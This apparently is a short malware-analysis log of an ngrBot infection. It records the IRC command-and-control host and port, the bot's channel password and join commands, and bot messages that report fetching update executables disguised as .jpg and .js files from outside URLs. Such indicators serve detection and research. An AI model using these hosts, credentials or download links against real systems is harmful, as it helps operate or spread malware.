92.241.165.134(ngrBot hosted in Russian Federation Oao Webalta)

Remote Host Port Number
200.122.132.122 80
213.251.170.52 80
81.169.145.73 80
92.241.165.134 7654 PASS ngrBot

NICK n{US|XPa}bbvvotv
USER bbvvotv 0 0 :bbvvotv
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d=”http://coopeande5.com/imagenes/principal.jpg.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0
PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 10 domain(s)

UPDATE:
PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 17 domain(s)
NICK n{US|XPa}vcnnzbg
USER vcnnzbg 0 0 :vcnnzbg
JOIN #oldgold noKIDs
JOIN #US
PRIVMSG #oldgold :[d=”http://gruposantuma.com/includes/js/wz_tooltip.js.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0

The data identified by the following URLs was then requested from the remote web server:
http://coopeande5.com/imagenes/principal.jpg.exe
http://api.wipmania.com/
http://www.cncshop.de/config/documentos.txt

hosting infos:
http://whois.domaintools.com/92.241.165.134